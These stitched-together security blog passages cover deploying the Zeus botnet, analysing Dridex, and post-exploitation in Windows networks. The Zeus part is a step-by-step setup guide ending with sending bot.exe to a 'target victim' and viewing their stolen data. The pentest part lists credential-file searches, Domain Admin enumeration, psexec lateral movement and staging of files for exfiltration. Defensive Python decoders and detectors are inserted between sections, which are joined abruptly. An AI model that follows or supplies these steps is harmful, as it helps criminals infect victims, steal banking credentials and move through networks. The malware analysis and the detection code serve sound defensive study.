The best aspect of going digital lies in the convenience of having a computer replace physical activity. Some say a remote administration tool is counterproductive to human work; however, remote administration tools have more pros than cons. Being connected is one such advantage: you can access any computer, and distance may not matter.

A Remote Administration Tool, or RAT, is software that allows a user to control a system without physical access to it. Thus, the remote “operator” gains full control over the device.

Although RATs and desktop sharing have legitimate uses, this type of software is often used in malicious activity. The operator controls the RAT through a network connection, and the tool typically hides from detection by security software.

RATs can carry out a number of activities once activated on a “client” computer. Apart from gathering login and account information, RATs can format drives and install applications silently. They can also run and operate without the victim’s knowledge.

Guide to setting up the Remote Administration Tool (RAT) Zeus BotNet:

This guide will help in setting up the Remote Administration Tool (RAT) Zeus BotNet. The guide requires downloading the software; we also need a database server and a web server for this task.

Zeus or Zbot is the infamous Trojan horse that was spread through phishing schemes and drive-by downloads. It installs itself and uses form grabbing and keystroke logging to steal banking information. In 2009, Zeus compromised over 74,000 FTP accounts on company websites, including those of Bank of America and NASA.

In 2010, Internet security providers claimed that the creator of Zeus was retiring and would sell the code to his competitor, the creator of the SpyEye Trojan. Experts later retracted this statement, saying that it was a ruse and that the developer might come back with new tricks. Binaries and source code have been on GitHub since 2011.

How to set up the Zeus Botnet RAT:

  1. The first thing to do is to have a database server and a web server running. Download XAMPP here to use for this task. Make sure that it is up and running, as well as your MySQL service.
  2. In your internet browser, go to http://localhost/phpmyadmin. Log in with the default username root and leave the password blank. Then create a database. The database name created here is used later to set up the Remote Administration Tool.
  3. Download the RAT file and extract it. There are three main folders in the archive: builder, server (PHP) and other. In your XAMPP files, locate the htdocs folder (C:\xampp\htdocs) and create a new folder inside it (you can use bot as the folder name). Finally, copy the contents of server[php] to C:\xampp\htdocs\bot.
  4. Next, go back to your web browser and open http://localhost/install/bot. Supply the correct details in each of the fields.

The host address of the MySQL server is your database server IP address, that is, the IP address of your XAMPP host. Supply the database name from step 2, and fill the encryption key with any characters, 1-255 in length. Afterward, proceed by clicking Install.

You might encounter an error while doing this step. The error says “Failed to connect to MySQL server: Host ‘myusername’ is not allowed to connect to this MySQL server.” Do the following to remedy this:

  1. First, open http://localhost/phpmyadmin. Click the Privileges tab, where you will find an edit button. Click the button to modify the privileges of the user root.
  2. Clicking the button leads you to the edit user page. Scroll down to see the login information. Change the Host from localhost to any host and then press the “Go” button. A dialogue box opens when the installation succeeds.

  5. You need to create and configure the Zeus bot client. In the builder folder, open the configuration file named config.txt. Change the url_server, url_loader, and url_config to match your settings. Also, remember to edit the path of webinjects.txt.
  6. At this point, open the zsb.exe file. This opens a dialogue box. Follow the steps as numbered in the image. This will build your bot executable.
  7. Bot executable and Bot config enable adding new files after step 6. These are the bot.exe and config.bin. Copy these files to the htdocs folder that we configured earlier (C:\xampp\htdocs\bot).
  8. The way to test this is to send the bot.exe to the target victim. Once the victim executes the file, we can see and check it through the attack server. Open your browser and go to http://localhost/bot/cp.php. Afterward, type your username and password.
  9. Finally, you gain entry to the newly infected victim as seen from your browser. It has all the information, which you can view right from your web interface. You can even see a screenshot of the victim’s desktop.


  • Zbot is very aggressive when it comes to attacks. The attacker can collect data and information about the infected victim, including very private and sensitive information, and can monitor the victim’s internet activities.
  • Zbot acts as a keylogger. Thus, it can capture login information, saving usernames and passwords entered on websites.
  • Since Zbot is a persistent Trojan, having up-to-date internet security software is key. Even then, this malware uses stealth techniques and is therefore tough to detect; antivirus software may only manage to prevent some infection attempts.
  • The best form of protection against Zbot is vigilance about suspicious links in email and on websites. Security experts advise users to avoid clicking anything that looks hostile. Staying on top of your pop-up settings can also help prevent Zbot infection.





Users download and execute malware onto their systems in a number of ways, but attachments are one of the most common. Users are easily tricked into clicking and downloading attachments. Furthermore, we use email for many transactions, including online banking, and as a result email makes us vulnerable to criminal and fraudulent activity.

Dridex is a banking Trojan, a type of malware that specializes in stealing bank account information. It is also known as Bugat or Cridex.

This malware primarily targets Windows users. Dridex arrives disguised as an email attachment, an Excel or Word file, which prompts the user to enable macros; the macro in turn downloads the Dridex malware, exposing the user to theft.

The primary goal of Dridex is to steal banking details such as account names, numbers, and passwords. Additionally, it allows attackers to perform fraudulent transactions using the stolen identities. The software carries out injection attacks and installs a keyboard listener on the infected machine.

This malware stole an estimated £20 million in the UK and, similarly, $10 million in the US in 2015. Since then, Dridex has infiltrated more than 20 countries. In September 2016, experts said that the banking Trojan would target crypto-currency wallets such as Bitcoin and others.

You may be in danger of opening malware if you receive an email containing remittance advice for BACS. BACS refers to Bankers’ Automated Clearing Services, which electronically processes financial transactions in the United Kingdom. Most victims come from the United Kingdom.


The email comes with an Excel attachment named BAC_296422H.xls. It runs automatically once opened, which is usually the case when macros are enabled in Microsoft Office. The malicious document is detected as X97M/DownldExe.A.

The macro downloads and executes a WinPE file that is named “test.exe” coming from The downloaded executable is usually W32/DridLd.A.

W32/DridLd.A is a component downloader of the Dridex malware. It belongs to the Cridex family and is arguably the heir to earlier banking Trojans. W32/DridLd.A steals banking account information through HTML injections.

W32/DridLd.A masquerades as a Windows component, which itself makes it suspicious. Upon closer inspection, one sees that the original and internal filename indicate a DLL, while the file type is specified as a Win32 EXE.


A debugger reveals a compressed executable, stored encrypted in the .data section. Unpacking that executable in turn reveals a compressed server config.

The unpacked .data section contains a list of the servers from which the malware component, Dridex, is downloaded.

Dridex collects some information before performing a POST to any of the listed servers. This system information includes the computer name, username, Windows version, installation date, application version, and finally the names of installed applications, which are enumerated from HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall.

Next, the malware builds a data buffer in XML:

<loader><get_module unique="v1" botnet="v2" system="v3" name="bot" bit="v4"/><soft><![CDATA[v5]]></soft></loader>



v1 = %ComputerName%_%MD5 of the checksum of UserName and InstallDate%

v2 = %Numeric Botnet ID% (125 in this case)

v3 = %Checksum(MajorVersion|MinorVersion|ServicePackMinor|ServicePackMinor|SuiteMask)%

v4 = %List of applications enumerated from Uninstall key delimited by “;”%


The malware sends a POST request to a server from the server config, carrying the stolen data as encrypted XML. The encryption is simply an XOR operation with “x” as the key.

The contacted BotNet server then replies to the request. This response is also encrypted XML, and one can decrypt it with the same XOR operation.
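As an added example (not code from the original article), here is a small Python decoder a responder could run over a captured POST body or server reply: it applies the single-byte XOR with “x”, checks for the <loader> wrapper, and pulls out the fingerprint fields and the application list from the <soft> CDATA section. The sample beacon, its hostname and its hash values are constructed for the example.

```python
import xml.etree.ElementTree as ET

XOR_KEY = 0x78  # ord("x"): the single-byte key the article reports for both directions


def xor_x(data: bytes) -> bytes:
    """XOR every byte with 'x'. The operation is its own inverse, so the same
    function decodes the bot's POST body and the server's reply."""
    return bytes(b ^ XOR_KEY for b in data)


def looks_like_loader_beacon(body: bytes) -> bool:
    """Cheap wire check: does the body decode to a <loader> XML document?"""
    return xor_x(body[:8]) == b"<loader>"


def parse_loader_beacon(body: bytes) -> dict:
    """Decode a captured POST body and extract the host fingerprint fields
    (unique id, numeric botnet id, system checksum, bit) plus the installed
    software list carried in the <soft> CDATA section."""
    if not looks_like_loader_beacon(body):
        raise ValueError("not an XOR-'x' encoded <loader> beacon")
    root = ET.fromstring(xor_x(body).decode("ascii", errors="replace"))
    get_module = root.find("get_module")
    if get_module is None:
        raise ValueError("<loader> without <get_module>")
    soft = root.findtext("soft") or ""
    return {
        "unique": get_module.get("unique"),
        "botnet": int(get_module.get("botnet", "0")),
        "system": get_module.get("system"),
        "name": get_module.get("name"),
        "bit": get_module.get("bit"),
        "software": [s for s in soft.split(";") if s],
    }


# Constructed sample (not a real capture): the beacon a host named WS01 in
# botnet 125 would send; the MD5 and checksum values are placeholders.
SAMPLE_PLAINTEXT = (
    '<loader><get_module unique="WS01_0123456789abcdef0123456789abcdef" '
    'botnet="125" system="1a2b3c4d" name="bot" bit="32"/>'
    '<soft><![CDATA[Microsoft Office 2010;Adobe Reader XI;7-Zip 9.20]]></soft></loader>'
)
SAMPLE_BODY = xor_x(SAMPLE_PLAINTEXT.encode("ascii"))  # as it would appear on the wire

if __name__ == "__main__":
    print(parse_loader_beacon(SAMPLE_BODY))
```

The same xor_x call decodes the server reply; since that reply carries the DLL, inspect the decoded bytes rather than parsing them as text.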

The decoded response contains the main DLL component of the Dridex malware. It is saved in the directory where the downloader XX.tmp was executed; XX varies, as in the example 15.tmp. W32/Dridex.A poses as a Microsoft library with the filename MFC110CHS.DLL.

The W32/Dridex.A downloader component is packed with the same compression technique. The unpacked .sdata section contains compressed data as well; this time, however, the data is compressed with a public key.

Rundll32.exe loads the main component. One can call it using the following syntax:

rundll32.exe %path to Dridex DLL%,NotifierInit

NotifierInit injects another copy of itself into explorer.exe. This happens after the main component is called through this exported function. Later, it deletes its file to avoid further detection by security scans.

From there, the malware can perform malicious activities while injected into explorer.exe. It can monitor browser activity in browsers such as Chrome, Firefox and Internet Explorer.

The malware also performs spyware functions: it grabs screenshots of the infected user’s desktop and acts as a keylogger that saves account information.

Dealing with emails and documents entails being vigilant about suspicious attachments. The Dridex attachment in particular seems inconspicuous, yet it is very harmful once opened, as its chain of infection is based on social engineering. Careful handling of such emails, therefore, prevents this malware.

Delete any email that you find suspicious or hostile and, if possible, do not open it. Emails that appear to originate from legitimate organizations should also be verified.

To prevent this malware, an antimalware solution with email coverage is essential. The software screens your emails, so one doesn’t have to worry about accidentally opening suspicious ones.

Contact your bank immediately once infected with Dridex. Change your banking information and update your passwords as soon as possible, for every account you have entered on the infected system.

One can also prevent this malware by keeping Microsoft Office’s macro security settings enabled, so that macros do not run by default. Because Dridex is macro-based malware, the possibility of it harming the system is significantly lower when this security is in place. IT admins can also enforce group policies that push these settings.

Banking theft is a serious crime. Therefore, we always need to be on top of security when it comes to malware. Emails need heavy guarding, as they are personal. Security breaches happen easily when people care less about their online activity.




Using APT tactics and techniques in your pentests

I have a student who has been asking me about internal network penetration testing, so I figured I’d write a blog post about APT tactics. I was trying to explain to him that there is so much more to it than just popping boxes. Breaking into a machine is easy; moving around a network and stealing data without getting caught is the real skill. For that, you will want to use the Tactics, Techniques, and Procedures (TTPs) employed by Advanced Persistent Threats (APTs).

When I do network penetration tests, I always explain to the customer that there are four levels of post exploitation. Therefore, they need to choose what level they want me to use based on the goals of the test.

  • Level 1: Access – proving that you can gain access to hosts.
  • Level 2: Leveraged Access – showing that you can jump from initially compromised hosts and move further to other hosts in the network.
  • Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials.
  • Level 4: Long term command and control (C2) – staying persistent in the environment for a prolonged period, then exfiltrating data out of the network.

In this post, I’ll cover a few of the things we pentesters do on internal pentests to data mine the network.

Data Mining The Host

At this point, you have just broken into a machine with a browser, PDF, or Java exploit, and you are sitting at your meterpreter prompt. You could run a few meterpreter scripts like winenum.rb, enum_domain_user, file_collector.rb, int_doc_find.rb or similar. Even so, I am going to walk you through doing this without meterpreter scripts, so that from here on you will better understand what those scripts are doing, or write your own.

Let’s start by turning our meterpreter shell into a regular shell.

meterpreter> execute -c -H -f cmd -a "/k" -i

Next, let’s figure out which updates are installed on this computer. On Windows 7/8 you can use DISM (note: DISM returns far more detail than WMIC):

c:\> DISM /Online /Get-Packages

Alternatively, with WMIC:

c:\> WMIC QFE List

Now that we have a regular command prompt, we will search the drive and sort the files by time accessed. We can use this to find interesting files by typing:

c:\> dir C:\ /S /OD /TA

Alternatively, if you know the date that a particular file was created, you can search the drive and sort by creation time by typing:

c:\> dir C:\ /S /OD /TC

You can do something similar based on the modification date, searching the drive and sorting the files by the time they were last written:

c:\> dir C:\ /S /OD /TW

Here is a trick that I use a lot: search the drive for files with business-critical words in their names. I type the following:

c:\> dir c:\*bank* /s
c:\> dir c:\*password* /s
c:\> dir c:\*pass* /s
c:\> dir c:\*competitor* /s
c:\> dir c:\*finance* /s

This is another set of goodies for financial and risk related data.

c:\> dir c:\*invoice* /s
c:\> dir c:\*risk* /s
c:\> dir c:\*assessment* /s

Further, these are good when you are looking for specific file types, for instance .key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files:

c:\> dir c:\*.key* /s
c:\> dir c:\*.vsd /s
c:\> dir c:\*.pcf /s
c:\> dir c:\*.ica /s
c:\> dir c:\*.crt /s
c:\> dir c:\*.log /s

I look especially hard for .pcf and .ica files: anything that can give me legitimate access to the network. There is no better backdoor than authorized access.

As a matter of fact, I did have a pentest where the customer had the password file with the name GeorgeBush.xlsx (yes, every network has a password text file or spreadsheet). Evidently, a penetration tester before me had found the password file when it was called passwords.xlsx. Later, they renamed the file. However, one can search a drive for files with critical data by other means besides their names. One can type:

c:\> type c:\sysprep.inf
c:\> type c:\sysprep\sysprep.xml
c:\> findstr /I /N /S /P /C:password *
c:\> findstr /I /N /S /P /C:secret *
c:\> findstr /I /N /S /P /C:confidential *
c:\> findstr /I /N /S /P /C:account *
c:\> findstr /I /N /S /P /C:payroll *
c:\> findstr /I /N /S /P /C:credit *
c:\> findstr /I /N /S /P /C:record *


Active Directory Enumeration

You have now pilfered the host you compromised. It’s time to spread your wings and look for new prey in the network, so we move on to Active Directory enumeration. I will write another blog post on lateral movement later.

I like using the net view command to look for other hosts in the network.

c:\> net view

We can also run net view /domain to get a list of domains and workgroups in the target environment.

c:\> net view /domain

Next, let’s look for local users (always check this; every once in a while you’ll run into a network that uses local accounts for things). System administrators often use local users and groups for administration tasks as a means of restricting access to the domain. Strangely enough, this can be good if done very carefully. On the other hand, it can be atrocious, as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\> net user

Now let’s grab a list of users in the domain.

c:\> net user /domain

For the same reason we checked for local users, we should check for local groups as well.

c:\> net localgroup
c:\> net localgroup /domain
c:\> net localgroup administrators

Now it’s time to get serious. The next few commands are where I get the best info.

c:\> net localgroup administrators /domain

Finding out the users in the domain is always handy, but there is nothing like the next command.

c:\> net group "Domain Users" /domain

This is where you make your money. I like to look for users in the Domain Admins group: after compromising my first host, I spear phish any user I find in the Domain Admins group. For me, that’s the fastest way to gain domain admin level access.

c:\> net group "Domain Admins" /domain
c:\> net user "jima" /domain
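Added defensive example, not part of the original post: a Python detector that reads process-creation log lines and flags a host when several of the reconnaissance command families from this post (patch enumeration, dir timeline sweeps, findstr/dir keyword sweeps, domain enumeration with net, Domain Admins and administrators lookups, psexec/winexe/net use) appear within a short window. The log line format, hostnames, users and timestamps are constructed for the example, not taken from any product.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per reconnaissance command family seen in the post (case-insensitive).
RECON_RULES = {name: re.compile(rx, re.I) for name, rx in {
    "patch_enum":    r"\b(dism(\.exe)?\s+/online\s+/get-packages|wmic(\.exe)?\s+qfe)\b",
    "file_timeline": r"\bdir\b(?=.*\s/s\b)(?=.*\s/o)(?=.*\s/t[acw]\b)",
    "keyword_sweep": r"\bfindstr\b(?=.*\s/s\b)(?=.*/c:(password|secret|confidential|account|payroll|credit|record)\b)"
                     r"|\bdir\b.*\*(bank|pass|password|competitor|finance|invoice|risk|assessment)\*",
    "domain_enum":   r"\bnet(\.exe)?\s+(view|user|group|localgroup)\b(?=.*\s/domain\b)",
    "admin_groups":  r"\bnet(\.exe)?\s+(localgroup\s+administrators|group\s+\"?domain admins)",
    "lateral_tool":  r"\b(psexec(\.exe)?|winexe)\b|\bnet(\.exe)?\s+use\s+\w:\s+\\\\",
}.items()}

# Constructed log line format (not any product's real schema).
LOG_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) cmd='(.*)'$")


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, host, user, cmd = m.groups()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, user, cmd


def classify(cmd):
    """Return the set of recon families a single command line belongs to."""
    return {name for name, rx in RECON_RULES.items() if rx.search(cmd)}


def find_recon_hosts(lines, window=timedelta(minutes=30), min_families=3):
    """Flag hosts with >= min_families distinct families inside one sliding window."""
    per_host = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, _user, cmd = parsed
        families = classify(cmd)
        if families:  # a lone dir or wmic is everyday admin noise; keep only hits
            per_host[host].append((ts, families))
    alerts = {}
    for host, events in per_host.items():
        events.sort(key=lambda e: e[0])
        best = set()
        for i, (start, _) in enumerate(events):
            seen = set()
            for ts, fams in events[i:]:
                if ts - start > window:
                    break
                seen |= fams
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_families:
            alerts[host] = sorted(best)
    return alerts


# Constructed sample: WS07 runs the post's sequence within ten minutes,
# WS12 and SRV01 each run a single, unremarkable command.
SAMPLE_LOG = r"""
2024-05-02T10:01:12Z host=WS07 user=CORP\jsmith cmd='WMIC QFE List'
2024-05-02T10:03:40Z host=WS07 user=CORP\jsmith cmd='dir C:\ /S /OD /TW'
2024-05-02T10:05:02Z host=WS07 user=CORP\jsmith cmd='findstr /I /N /S /P /C:password *'
2024-05-02T10:09:55Z host=WS07 user=CORP\jsmith cmd='net view /domain'
2024-05-02T10:10:30Z host=WS07 user=CORP\jsmith cmd='net group "Domain Admins" /domain'
2024-05-02T10:12:00Z host=WS07 user=CORP\jsmith cmd='psexec.exe /accepteula \\FS01 -u administrator cmd.exe'
2024-05-02T10:02:00Z host=WS12 user=CORP\mlee cmd='net view'
2024-05-02T14:45:00Z host=SRV01 user=CORP\svc_patch cmd='DISM /Online /Get-Packages'
""".strip().splitlines()
```

Running find_recon_hosts(SAMPLE_LOG) flags only WS07; tune window and min_families to your environment's admin baseline.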


OK, at this point, let’s start moving around the network.

No Nmap? No problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file. Here is pingsweep.bat (more pingsweep.bat shows its contents), created with two echo commands:

echo @echo off > pingsweep.bat
echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat

Afterward, all you have to do is type pingsweep followed by the first 3 octets of the target subnet.

pingsweep 10.10.30

If you need to generate a list of IP addresses, you can use this quick for loop:

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt
more ips.txt

Next, let’s echo some domain account names into a text file.

echo heat >> names.txt
echo jima >> names.txt
echo roge >> names.txt
echo patr >> names.txt
echo jami >> names.txt
echo bonn >> names.txt
echo rhon >> names.txt
echo sall >> names.txt
echo joyj >> names.txt
echo laur >> names.txt
echo sloa >> names.txt
echo Administrator >> names.txt
more names.txt

Then we can use a for loop to collect the host names from net view into hosts.txt, which we use when looking for logged-in users:

for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt


After you come across machines where users are logged in, and you have their passwords or hashes, you can PSExec to those machines. I acknowledge that I skipped password stealing and hash dumping; I will cover it in another article if you guys still want me to.

PSExec in Windows

c:\> psexec.exe /accepteula \\ -u administrator -p <password> cmd.exe

PSExec in Linux

Just for the sake of making sure that you have this syntax, here is how to do PSExec from Linux. I prefer to use a tool called winexe. I have it on my Amazon S3 if you want to download it from me.

cd ~/toolz
chmod 777 winexe
./winexe -U Administrator%<password> //WIN7-X64-1 cmd.exe

Here is how I figure out how many users are logged on to or connected to a server:

Finally, just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat): run all of the dir commands again, and all of the findstr commands again. Grab all of the interesting files, then map a drive to what you want to become your staging server and copy the files there. Here is how to map a network drive, and how to disconnect it afterward:

net use O: \\\c$ /u:administrator <password>
net use /d O:


Whew, this was quite a long blog post. We covered a lot today; however, there is a lot we didn’t cover: password stealing, hashdump, pass the hash, and data exfiltration.

Finally, I’d love it if you check out the Metasploit Next Level Video Series for only $50:

Let’s call it quits right there, and I’ll probably come back in a day or so and give you something else to chew.

